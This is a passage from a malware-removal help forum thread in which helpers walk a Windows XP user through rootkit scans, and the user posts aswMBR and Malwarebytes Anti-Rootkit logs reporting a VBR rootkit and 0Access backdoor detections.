Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\Microsoft Antimalware Scheduled Scan.job => c:\Program Files\Microsoft Security Client\MpCmdRun.exe
Task: C:\WINDOWS\Tasks\Norton Security Scan for Buddy Harris.job => C:\Program Files\Norton Security Scan\Engine\2.3.0.44\Nss.exe
Task: C:\WINDOWS\Tasks\Re-Markable_wd.job => C:\Program Files\Re-Markable\Re-Markable_wd.exe
Task: C:\WINDOWS\Tasks\RealUpgradeLogonTaskS-1-5-18.job => C:\Program Files\Real\RealUpgrade\realupgrade.exe
Task: C:\WINDOWS\Tasks\RealUpgradeScheduledTaskS-1-5-18.job => C:\Program Files\Real\RealUpgrade\realupgrade.exe
Task: C:\WINDOWS\Tasks\RealUpgradeScheduledTaskS-1-5-21-608057341-2165517387-3308722516-1005.job => C:\Program Files\Real\RealUpgrade\realupgrade.exe
Task: C:\WINDOWS\Tasks\User_Feed_Synchronization-{042C18C8-CDF0-49EE-A260-F2CEEBFEDE6A}.job => C:\WINDOWS\system32\msfeedssync.exe

==================== Loaded Modules (whitelisted) =============

2009-03-13 11:16 - 2008-02-25 00:29 - 00466944 _____ () C:\WINDOWS\system32\nvshell.dll
2010-03-22 12:27 - 2010-03-22 12:27 - 00040960 _____ () C:\Documents and Settings\All Users\Application Data\Real\RealPlayer\BrowserRecordPlugin\Chrome\Hook\rpchromebrowserrecordhelper.dll
2014-02-23 10:05 - 2014-02-23 10:05 - 00093184 _____ () C:\Program Files\Re-Markable\Re-Markable_wd.exe
2013-12-15 18:50 - 2013-10-29 15:08 - 04074824 _____ () C:\Program Files\Optimizer Pro\OptProCrash.dll
2013-12-15 18:50 - 2013-12-15 18:50 - 00190616 _____ () C:\Program Files\Optimizer Pro\OptProCrashSvc.dll
2009-03-13 11:56 - 2007-05-13 23:54 - 00264424 ____N () C:\Program Files\CyberLink\Shared files\RichVideo.exe
2011-03-09 15:21 - 2011-03-09 15:21 - 00619816 _____ () C:\Program Files\CyberLink\Power2Go\CLMediaLibrary.dll
2011-03-09 15:21 - 2011-03-09 15:21 - 00013096 _____ () C:\Program Files\CyberLink\Power2Go\CLMLSvcPS.dll
2009-03-13 11:15 - 2008-04-14 08:00 - 00059904 _____ () C:\WINDOWS\system32\devenum.dll
2009-03-13 11:15 - 2008-04-14 08:00 - 00014336 _____ () C:\WINDOWS\system32\msdmo.dll
2013-10-18 19:55 - 2013-10-18 19:55 - 25100288 _____ () C:\Documents and Settings\Buddy Harris\Application Data\Dropbox\bin\libcef.dll
2009-07-14 18:03 - 2000-08-31 07:00 - 00332800 _____ () C:\Program Files\Jasc Software Inc\Paint Shop Pro 7\Fpxlib.dll
2009-07-14 18:03 - 2000-08-31 07:00 - 00122880 _____ () C:\Program Files\Jasc Software Inc\Paint Shop Pro 7\JPEGLib.dll
2014-02-14 08:18 - 2014-02-14 08:19 - 03578992 _____ () C:\Program Files\Mozilla Firefox\mozjs.dll
2009-03-13 11:15 - 2013-01-02 02:49 - 01292288 _____ () C:\WINDOWS\system32\quartz.dll
2014-03-12 09:24 - 2014-03-12 09:24 - 16276872 _____ () C:\WINDOWS\system32\Macromed\Flash\NPSWF32_12_0_0_77.dll
2014-02-23 10:05 - 2014-02-23 10:05 - 00181248 _____ () C:\Program Files\Re-Markable\Re-Markable154.exe

==================== Alternate Data Streams (whitelisted) =========

AlternateDataStreams: C:\Documents and Settings\All Users\Application Data\Temp:A8ADE5D8
AlternateDataStreams: C:\Documents and Settings\All Users\Application Data\Temp:DFC5A2B2

==================== Safe Mode (whitelisted) ===================

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\42233895.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\42233895.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vsmon => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{1a3e09be-1e45-494b-9174-d7385b45bbf5} => ""=""

==================== Disabled items from MSCONFIG ==============

MSCONFIG\startupreg: Adobe ARM => "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: Adobe Reader Speed Launcher => "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
MSCONFIG\startupreg: Babylon Client => C:\Program Files\Babylon\Babylon-Pro\Babylon.exe -AutoStart
MSCONFIG\startupreg: Freecorder FLV Service => "C:\Program Files\Freecorder\FLVSrvc.exe" /run
MSCONFIG\startupreg: swg => "C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
MSCONFIG\startupreg: TkBellExe => "C:\Program Files\Common Files\Real\Update_OB\realsched.exe"  -osboot

==================== Faulty Device Manager Devices =============

Name: PS/2 Compatible Mouse
Description: PS/2 Compatible Mouse
Class Guid: {4D36E96F-E325-11CE-BFC1-08002BE10318}
Manufacturer: Microsoft
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.


==================== Event log errors: =========================

Application errors:
==================
Error: (03/19/2014 06:35:46 AM) (Source: MPSampleSubmission) (User: )
Description: EventType avsubmit, P1 microsoft security essentials (edb4fa23-53b8-4afa-8c5d-99752cca7094), P2 1.1.10401.0, P3 1.169.70.0, P4 1.169.70.0, P5 unknown, P6 NIL, P7 NIL, P8 NIL, P9 avsubmit0, P10 avsubmit1.

Error: (03/18/2014 10:30:02 AM) (Source: MPSampleSubmission) (User: )
Description: EventType avsubmit, P1 microsoft security essentials (edb4fa23-53b8-4afa-8c5d-99752cca7094), P2 1.1.10401.0, P3 1.169.70.0, P4 1.169.70.0, P5 unknown, P6 NIL, P7 NIL, P8 NIL, P9 avsubmit0, P10 avsubmit1.

Error: (03/18/2014 07:03:17 AM) (Source: Application Hang) (User: )
Description: Hanging application iexplore.exe, version 8.0.6001.18702, hang module hungapp, version 0.0.0.0, hang address 0x00000000.

Error: (03/18/2014 07:03:16 AM) (Source: Application Hang) (User: )
Description: Hanging application iexplore.exe, version 8.0.6001.18702, hang module hungapp, version 0.0.0.0, hang address 0x00000000.

Error: (03/12/2014 01:26:26 PM) (Source: ESENT) (User: )
Description: wuauclt (49000) An attempt to delete the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edbtmp.log" failed with system error 32 (0x00000020): "The process cannot access the file because it is being used by another process. ".  The delete file operation will fail with error -1032 (0xfffffbf8).

Error: (02/23/2014 10:08:07 AM) (Source: crypt32) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.

Error: (02/23/2014 10:08:07 AM) (Source: crypt32) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.

Error: (02/18/2014 01:28:08 AM) (Source: MPSampleSubmission) (User: )
Description: EventType mptelemetry, P1 2152759308, P2 unspecified, P3 scanfile, P4 4.4.304.0, P5 microsoft security essentials (edb4fa23-53b8-4afa-8c5d-99752cca7094), P6 unspecified, P7 unspecified, P8 NIL, P9 mptelemetry0, P10 mptelemetry1.

Error: (02/16/2014 10:50:39 AM) (Source: Application Error) (User: )
Description: Fault bucket 68557324.
The Wep key exchange did not result in a secure connection setup after 802.1x authentication.  The current setting has been marked as failed and the Wireless connection will be disconnected.

Error: (02/16/2014 10:49:49 AM) (Source: Application Error) (User: )
Description: Faulting application plugin-container.exe, version 27.0.1.5156, faulting module mozalloc.dll, version 27.0.1.5156, fault address 0x0000119c.
Processing media-specific event for [plugin-container.exe!ws!]


System errors:
=============
Error: (03/20/2014 09:28:00 AM) (Source: Schedule) (User: )
Description: The At27.job command failed to start due to the following error:
%%2147942403

Error: (03/20/2014 09:28:00 AM) (Source: Schedule) (User: )
Description: The At26.job command failed to start due to the following error:
%%2147942403

Error: (03/20/2014 09:28:00 AM) (Source: Schedule) (User: )
Description: The At25.job command failed to start due to the following error:
%%2147942403

Error: (03/20/2014 08:28:00 AM) (Source: Schedule) (User: )
Description: The At27.job command failed to start due to the following error:
%%2147942403

Error: (03/20/2014 08:28:00 AM) (Source: Schedule) (User: )
Description: The At26.job command failed to start due to the following error:
%%2147942403

Error: (03/20/2014 08:28:00 AM) (Source: Schedule) (User: )
Description: The At25.job command failed to start due to the following error:
%%2147942403

Error: (03/20/2014 07:28:00 AM) (Source: Schedule) (User: )
Description: The At27.job command failed to start due to the following error:
%%2147942403

Error: (03/20/2014 07:28:00 AM) (Source: Schedule) (User: )
Description: The At26.job command failed to start due to the following error:
%%2147942403

Error: (03/20/2014 07:28:00 AM) (Source: Schedule) (User: )
Description: The At25.job command failed to start due to the following error:
%%2147942403

Error: (03/20/2014 06:28:00 AM) (Source: Schedule) (User: )
Description: The At27.job command failed to start due to the following error:
%%2147942403


Microsoft Office Sessions:
=========================

==================== Memory info ===========================

Percentage of memory in use: 70%
Total physical RAM: 894.42 MB
Available physical RAM: 260.05 MB
Total Pagefile: 2168.02 MB
Available Pagefile: 1130.48 MB
Total Virtual: 2047.88 MB
Available Virtual: 1906.25 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:139.04 GB) (Free:82.51 GB) NTFS ==>[Drive with boot components (Windows XP)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 149 GB) (Disk ID: C9C06833)

Partition: GPT Partition Type.

==================== End Of Log ============================
 

Link to post
Share on other sites

uh oh...

 

 

Scan with aswMBR

Please download aswMBR ( 4.5MB ) to your desktop.

  • Double click the aswMBR.exe icon, and click Run.
  • There will be a short delay before the next dialog box comes up. Please just wait a minute or two.
  • When asked if you'd like to "download the latest Avast! virus definitions", click Yes.
  • Typically this is about a 100MB download so depending on your connection speed it can take a short while to download and become ready.
  • Click the Scan button to start the scan once the update has finished downloading
  • On completion of the scan, click the save log button, save it to your desktop, then copy and paste it in your next reply.


Note: There will also be a file on your desktop named MBR.dat do not delete this for now. It is an actual backup of the MBR (master boot record).

Link to post
Share on other sites

aswMBR version 0.9.9.1771 Copyright© 2011 AVAST Software
Run date: 2014-03-20 10:38:39
-----------------------------
10:38:39.828    OS Version: Windows 5.1.2600 Service Pack 3
10:38:39.828    Number of processors: 1 586 0x7F02
10:38:39.828    ComputerName: EMACHINE-98E05C  UserName: Buddy Harris
10:38:40.703    Initialize success
10:39:06.593    Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP4T0L0-12
10:39:06.609    Disk 0 Vendor: Hitachi_HDT721016SLA380 ST1OA31B Size: 152627MB BusType: 3
10:39:06.812    Disk 0 MBR read successfully
10:39:06.812    Disk 0 MBR scan
10:39:06.812    Disk 0 unknown MBR code
10:39:06.828    Disk 0 Partition 1 00     12  Compaq diag NTFS        10240 MB offset 2048
10:39:06.843    Disk 0 Partition 2 00     07    HPFS/NTFS NTFS       142376 MB offset 20973568
10:39:06.875    Disk 0 Partition 3 80 (A) 17 Hidd HPFS/NTFS NTFS           10 MB offset 312560640
10:39:06.875    Disk 0 Partition 3  **SUSPICIOUS**
10:39:06.875    Disk 0 scanning sectors +312581792
10:39:07.078    Disk 0 scanning C:\WINDOWS\system32\drivers
10:39:13.531    Service scanning
10:39:24.671    Service MpKsl986fd788 c:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{5EEF60F5-22C5-471C-900A-286C4260DD8F}\MpKsl986fd788.sys **LOCKED** 32
10:39:35.312    Modules scanning
10:39:45.250    Disk 0 trace - called modules:
10:39:45.281    ntkrnlpa.exe CLASSPNP.SYS disk.sys ACPI.sys hal.dll atapi.sys pciide.sys PCIIDEX.SYS
10:39:45.281    1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0x851eeab8]
10:39:45.296    3 CLASSPNP.SYS[f74c7fd7] -> nt!IofCallDriver -> \Device\00000064[0x852ba318]
10:39:45.296    5 ACPI.sys[f735e620] -> nt!IofCallDriver -> \Device\Ide\IdeDeviceP4T0L0-12[0x85236940]
10:39:45.296    Scan finished successfully
10:40:41.703    Disk 0 MBR has been saved successfully to "C:\Documents and Settings\Buddy Harris\Desktop\MBR.dat"
10:40:41.718    The log file has been saved successfully to "C:\Documents and Settings\Buddy Harris\Desktop\aswMBR.txt"

 

Link to post
Share on other sites

Scan with Malwarebytes Anti-Rootkit

Please download Malwarebytes Anti-Rootkit from here Malwarebytes : Malwarebytes Anti-Rootkit and save it to your desktop.

Be sure to print out and follow the instructions provided on that same page.

Caution: This is a beta version so please be sure to read the disclaimer and back up any important data before using.

  • Double click the mbar.zip file to open it, then 'Extract all files'.
  • Double click the mbar folder to open it, then double click mbar.exe to start the tool.


Check for Updates, then Scan your system for malware

If malware is found, do NOT press the Cleanup button yet. Click EXIT.

I'd like to see the log first so I can see what it sees. You'll find the log in that mbar folder as MBAR-log-[date and time]***.txt . Please attach that to your next reply.

Link to post
Share on other sites

I found it:

 

 

---------------------------------------
Malwarebytes Anti-Rootkit BETA 1.07.0.1009

© Malwarebytes Corporation 2011-2012

OS version: 5.1.2600 Windows XP Service Pack 3 x86

Account is Administrative

Internet Explorer version: 8.0.6001.18702

Java version: 1.6.0_37

File system is: NTFS
Disk drives: C:\ DRIVE_FIXED
CPU speed: 1.607000 GHz
Memory total: 937865216, free: 159211520

---------------------------------------
Malwarebytes Anti-Rootkit BETA 1.07.0.1009

© Malwarebytes Corporation 2011-2012

OS version: 5.1.2600 Windows XP Service Pack 3 x86

Account is Administrative

Internet Explorer version: 8.0.6001.18702

Java version: 1.6.0_37

File system is: NTFS
Disk drives: C:\ DRIVE_FIXED
CPU speed: 1.607000 GHz
Memory total: 937865216, free: 177180672

Downloaded database version: v2014.03.20.05
Downloaded database version: v2014.03.18.01
=======================================
Initializing...
------------ Kernel report ------------
     03/20/2014 16:29:51
------------ Loaded modules -----------
\WINDOWS\system32\ntkrnlpa.exe
\WINDOWS\system32\hal.dll
\WINDOWS\system32\KDCOM.DLL
\WINDOWS\system32\BOOTVID.dll
ACPI.sys
\WINDOWS\system32\DRIVERS\WMILIB.SYS
pci.sys
isapnp.sys
pciide.sys
\WINDOWS\system32\DRIVERS\PCIIDEX.SYS
MountMgr.sys
ftdisk.sys
PartMgr.sys
VolSnap.sys
atapi.sys
disk.sys
\WINDOWS\system32\DRIVERS\CLASSPNP.SYS
fltMgr.sys
MpFilter.sys
KSecDD.sys
WudfPf.sys
Ntfs.sys
NDIS.sys
Mup.sys
\SystemRoot\system32\DRIVERS\AmdPPM.sys
\SystemRoot\system32\DRIVERS\wmiacpi.sys
\SystemRoot\system32\DRIVERS\mouclass.sys
\SystemRoot\system32\DRIVERS\usbohci.sys
\SystemRoot\system32\DRIVERS\USBPORT.SYS
\SystemRoot\system32\DRIVERS\usbehci.sys
\SystemRoot\system32\DRIVERS\HDAudBus.sys
\SystemRoot\system32\DRIVERS\nvnetbus.sys
\SystemRoot\system32\DRIVERS\NVNRM.SYS
\SystemRoot\system32\DRIVERS\imapi.sys
\SystemRoot\system32\drivers\pfc.sys
\SystemRoot\system32\DRIVERS\cdrom.sys
\SystemRoot\system32\DRIVERS\redbook.sys
\SystemRoot\system32\DRIVERS\ks.sys
\SystemRoot\system32\DRIVERS\AGRSM.sys
\SystemRoot\system32\DRIVERS\USBD.SYS
\SystemRoot\System32\Drivers\Modem.SYS
\SystemRoot\system32\DRIVERS\nv4_mini.sys
\SystemRoot\system32\DRIVERS\VIDEOPRT.SYS
\SystemRoot\system32\DRIVERS\clwvd.sys
\SystemRoot\system32\DRIVERS\audstub.sys
\SystemRoot\system32\DRIVERS\rasl2tp.sys
\SystemRoot\system32\DRIVERS\ndistapi.sys
\SystemRoot\system32\DRIVERS\ndiswan.sys
\SystemRoot\system32\DRIVERS\raspppoe.sys
\SystemRoot\system32\DRIVERS\raspptp.sys
\SystemRoot\system32\DRIVERS\TDI.SYS
\SystemRoot\system32\DRIVERS\psched.sys
\SystemRoot\system32\DRIVERS\msgpc.sys
\SystemRoot\system32\DRIVERS\ptilink.sys
\SystemRoot\system32\DRIVERS\raspti.sys
\SystemRoot\system32\DRIVERS\termdd.sys
\SystemRoot\system32\DRIVERS\kbdclass.sys
\SystemRoot\system32\DRIVERS\swenum.sys
\SystemRoot\system32\DRIVERS\update.sys
\SystemRoot\system32\DRIVERS\mssmbios.sys
\SystemRoot\System32\Drivers\NDProxy.SYS
\SystemRoot\system32\DRIVERS\usbhub.sys
\SystemRoot\system32\DRIVERS\NVENETFD.sys
\SystemRoot\system32\drivers\RtkHDAud.sys
\SystemRoot\system32\drivers\portcls.sys
\SystemRoot\system32\drivers\drmk.sys
\SystemRoot\System32\Drivers\i2omgmt.SYS
\SystemRoot\System32\Drivers\Fs_Rec.SYS
\SystemRoot\System32\Drivers\Null.SYS
\SystemRoot\System32\Drivers\Beep.SYS
\SystemRoot\system32\DRIVERS\i8042prt.sys
\SystemRoot\system32\DRIVERS\HIDPARSE.SYS
\SystemRoot\System32\drivers\vga.sys
\SystemRoot\System32\Drivers\mnmdd.SYS
\SystemRoot\System32\DRIVERS\RDPCDD.sys
\SystemRoot\System32\Drivers\Msfs.SYS
\SystemRoot\System32\Drivers\Npfs.SYS
\SystemRoot\system32\DRIVERS\rasacd.sys
\SystemRoot\system32\DRIVERS\ipsec.sys
\SystemRoot\system32\DRIVERS\tcpip.sys
\SystemRoot\system32\DRIVERS\netbt.sys
\SystemRoot\System32\drivers\afd.sys
\SystemRoot\system32\DRIVERS\netbios.sys
\SystemRoot\system32\DRIVERS\rdbss.sys
\SystemRoot\system32\DRIVERS\mrxsmb.sys
\SystemRoot\System32\Drivers\Fips.SYS
\SystemRoot\system32\DRIVERS\ipnat.sys
\SystemRoot\system32\DRIVERS\wanarp.sys
\SystemRoot\system32\DRIVERS\usbccgp.sys
\SystemRoot\system32\DRIVERS\USBSTOR.SYS
\SystemRoot\system32\DRIVERS\hidusb.sys
\SystemRoot\system32\DRIVERS\HIDCLASS.SYS
\SystemRoot\system32\DRIVERS\kbdhid.sys
\SystemRoot\system32\DRIVERS\mouhid.sys
\SystemRoot\System32\Drivers\Cdfs.SYS
\SystemRoot\System32\Drivers\dump_atapi.sys
\SystemRoot\System32\Drivers\dump_WMILIB.SYS
\SystemRoot\System32\win32k.sys
\SystemRoot\System32\drivers\Dxapi.sys
\SystemRoot\System32\watchdog.sys
\SystemRoot\System32\drivers\dxg.sys
\SystemRoot\System32\drivers\dxgthk.sys
\SystemRoot\System32\nv4_disp.dll
\SystemRoot\System32\ATMFD.DLL
\SystemRoot\system32\DRIVERS\ndisuio.sys
\SystemRoot\system32\drivers\wdmaud.sys
\SystemRoot\system32\drivers\sysaudio.sys
\SystemRoot\system32\DRIVERS\mrxdav.sys
\??\C:\WINDOWS\system32\drivers\int15.sys
\SystemRoot\system32\DRIVERS\srv.sys
\SystemRoot\system32\drivers\npf.sys
\??\C:\Program Files\Free Ride Games\X4HS32Ex.Sys
\SystemRoot\System32\Drivers\HTTP.sys
\SystemRoot\system32\DRIVERS\sr.sys
\??\C:\DOCUME~1\BUDDYH~1\LOCALS~1\Temp\aswMBR.sys
\??\c:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{5EEF60F5-22C5-471C-900A-286C4260DD8F}\MpKsl986fd788.sys
\SystemRoot\system32\drivers\kmixer.sys
\??\C:\WINDOWS\system32\drivers\mbamchameleon.sys
\??\C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys
\WINDOWS\system32\ntdll.dll
----------- End -----------
Done!
<<<1>>>
Upper Device Name: \Device\Harddisk2\DR5
Upper Device Object: 0xffffffff85124120
Upper Device Driver Name: \Driver\Disk\
Lower Device Name: \Device\00000071\
Lower Device Object: 0xffffffff85250030
Lower Device Driver Name: \Driver\USBSTOR\
<<<1>>>
Upper Device Name: \Device\Harddisk1\DR4
Upper Device Object: 0xffffffff84e9e2d0
Upper Device Driver Name: \Driver\Disk\
Lower Device Name: \Device\00000070\
Lower Device Object: 0xffffffff84ed9d08
Lower Device Driver Name: \Driver\USBSTOR\
<<<1>>>
Upper Device Name: \Device\Harddisk0\DR0
Upper Device Object: 0xffffffff851eeab8
Upper Device Driver Name: \Driver\Disk\
Lower Device Name: \Device\Ide\IdeDeviceP4T0L0-12\
Lower Device Object: 0xffffffff85236940
Lower Device Driver Name: \Driver\atapi\
<<<2>>>
Physical Sector Size: 512
Drive: 0, DevicePointer: 0xffffffff851eeab8, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xffffffff85237900, DeviceName: Unknown, DriverName: \Driver\PartMgr\
DevicePointer: 0xffffffff851eeab8, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
DevicePointer: 0xffffffff852ba318, DeviceName: \Device\00000064\, DriverName: \Driver\ACPI\
DevicePointer: 0xffffffff85236940, DeviceName: \Device\Ide\IdeDeviceP4T0L0-12\, DriverName: \Driver\atapi\
------------ End ----------
Alternate DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
Upper DeviceData: 0x0, 0x0, 0x0
Lower DeviceData: 0x0, 0x0, 0x0
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
Scanning drivers directory: C:\WINDOWS\SYSTEM32\drivers...
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
Done!
Drive 0
Scanning MBR on drive 0...
Inspecting partition table:
MBR Signature: 55AA
Disk Signature: C9C06833

Partition information:

    Partition 0 type is Other (0x12)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 2048  Numsec = 20971520

    Partition 1 type is Primary (0x7)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 20973568  Numsec = 291587072

    Partition 2 type is HIDDEN (0x17)
    Partition is ACTIVE.
    Partition starts at LBA: 312560640  Numsec = 21152
    Partition is not bootable
Infected: VBR on Hidden active partition --> [unknown.Rootkit.VBR]
Physical drive 0 is not bootable
Bootable physical drive, other than a system drive has been found

    Partition 2 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0

    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0

MBR infection found on drive 0
Disk Size: 160041885696 bytes
Sector size: 512 bytes

Scanning physical sectors of unpartitioned space on drive 0 (1-2047-312561808-312581808)...
Done!
Physical Sector Size: 0
Drive: 1, DevicePointer: 0xffffffff84e9e2d0, DeviceName: \Device\Harddisk1\DR4\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xffffffff85030718, DeviceName: Unknown, DriverName: \Driver\PartMgr\
DevicePointer: 0xffffffff84e9e2d0, DeviceName: \Device\Harddisk1\DR4\, DriverName: \Driver\Disk\
DevicePointer: 0xffffffff84ed9d08, DeviceName: \Device\00000070\, DriverName: \Driver\USBSTOR\
------------ End ----------
Physical Sector Size: 0
Drive: 2, DevicePointer: 0xffffffff85124120, DeviceName: \Device\Harddisk2\DR5\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xffffffff85250b78, DeviceName: Unknown, DriverName: \Driver\PartMgr\
DevicePointer: 0xffffffff85124120, DeviceName: \Device\Harddisk2\DR5\, DriverName: \Driver\Disk\
DevicePointer: 0xffffffff85250030, DeviceName: \Device\00000071\, DriverName: \Driver\USBSTOR\
------------ End ----------
Infected: C:\WINDOWS\system32\c_68825.nls --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\@" is compressed (flags = 1)
Read File: File "c:\windows\$ntuninstallkb877$\395111198\loader.tlb" is compressed (flags = 1)
Read File: File "c:\windows\$ntuninstallkb877$\395111198\l\aatagjfo" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\l\aatagjfo --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\u\@00000001" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\u\@00000001 --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\u\@000000c0" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\u\@000000c0 --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\u\@000000cb" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\u\@000000cb --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\u\@000000cf" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\u\@000000cf --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\u\@80000000" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\u\@80000000 --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\u\@800000c0" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\u\@800000c0 --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\u\@800000cb" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\u\@800000cb --> [backdoor.0Access]
Read File: File "c:\windows\$ntuninstallkb877$\395111198\u\@800000cf" is compressed (flags = 1)
Infected: c:\windows\$ntuninstallkb877$\395111198\u\@800000cf --> [backdoor.0Access]
Infected: c:\windows\$ntuninstallkb877$\2860961191 --> [backdoor.0Access]
Infected: c:\windows\$ntuninstallkb877$\395111198 --> [backdoor.0Access]
Infected: c:\windows\$ntuninstallkb877$\395111198\@ --> [backdoor.0Access]
Infected: c:\windows\$ntuninstallkb877$\395111198\loader.tlb --> [backdoor.0Access]
Infected: c:\windows\$ntuninstallkb877$\395111198\l --> [backdoor.0Access]
Infected: c:\windows\$ntuninstallkb877$\395111198\u --> [backdoor.0Access]
Scan finished
 

Link to post
Share on other sites

Fix with Malwarebytes Anti-Rootkit

Run another scan with mbar.exe and click the CleanUp button. It will require a reboot.

When it has rebooted, run another scan with mbar.exe and click CleanUp again if necessary.

Send the mbar-log.txt along with an update on machine behavior.

Link to post
Share on other sites

No malware found. I plan to post the log now and restart the system to see how everything is working.

Is that the correct thing to do?

 

 

---------------------------------------
Malwarebytes Anti-Rootkit BETA 1.07.0.1009

© Malwarebytes Corporation 2011-2012

OS version: 5.1.2600 Windows XP Service Pack 3 x86

Account is Administrative

Internet Explorer version: 8.0.6001.18702

Java version: 1.6.0_37

File system is: NTFS
Disk drives: C:\ DRIVE_FIXED
CPU speed: 1.607000 GHz
Memory total: 937865216, free: 159211520

---------------------------------------
Malwarebytes Anti-Rootkit BETA 1.07.0.1009

© Malwarebytes Corporation 2011-2012

OS version: 5.1.2600 Windows XP Service Pack 3 x86

Account is Administrative

Internet Explorer version: 8.0.6001.18702

Java version: 1.6.0_37

File system is: NTFS
Disk drives: C:\ DRIVE_FIXED
CPU speed: 1.607000 GHz
Memory total: 937865216, free: 177180672

Downloaded database version: v2014.03.20.05
Downloaded database version: v2014.03.18.01
=======================================
Initializing...
------------ Kernel report ------------
     03/20/2014 16:29:51
------------ Loaded modules -----------
\WINDOWS\system32\ntkrnlpa.exe
\WINDOWS\system32\hal.dll
\WINDOWS\system32\KDCOM.DLL
\WINDOWS\system32\BOOTVID.dll
ACPI.sys
\WINDOWS\system32\DRIVERS\WMILIB.SYS
pci.sys
isapnp.sys
pciide.sys
\WINDOWS\system32\DRIVERS\PCIIDEX.SYS
MountMgr.sys
ftdisk.sys
PartMgr.sys
VolSnap.sys
atapi.sys
disk.sys
\WINDOWS\system32\DRIVERS\CLASSPNP.SYS
fltMgr.sys
MpFilter.sys
KSecDD.sys
WudfPf.sys
Ntfs.sys
NDIS.sys
Mup.sys
\SystemRoot\system32\DRIVERS\AmdPPM.sys
\SystemRoot\system32\DRIVERS\wmiacpi.sys
\SystemRoot\system32\DRIVERS\mouclass.sys
\SystemRoot\system32\DRIVERS\usbohci.sys
\SystemRoot\system32\DRIVERS\USBPORT.SYS
\SystemRoot\system32\DRIVERS\usbehci.sys
\SystemRoot\system32\DRIVERS\HDAudBus.sys
\SystemRoot\system32\DRIVERS\nvnetbus.sys
\SystemRoot\system32\DRIVERS\NVNRM.SYS
\SystemRoot\system32\DRIVERS\imapi.sys
\SystemRoot\system32\drivers\pfc.sys
\SystemRoot\system32\DRIVERS\cdrom.sys
\SystemRoot\system32\DRIVERS\redbook.sys
\SystemRoot\system32\DRIVERS\ks.sys
\SystemRoot\system32\DRIVERS\AGRSM.sys
\SystemRoot\system32\DRIVERS\USBD.SYS
\SystemRoot\System32\Drivers\Modem.SYS
\SystemRoot\system32\DRIVERS\nv4_mini.sys
\SystemRoot\system32\DRIVERS\VIDEOPRT.SYS
\SystemRoot\system32\DRIVERS\clwvd.sys
\SystemRoot\system32\DRIVERS\audstub.sys
\SystemRoot\system32\DRIVERS\rasl2tp.sys
\SystemRoot\system32\DRIVERS\ndistapi.sys
\SystemRoot\system32\DRIVERS\ndiswan.sys
\SystemRoot\system32\DRIVERS\raspppoe.sys
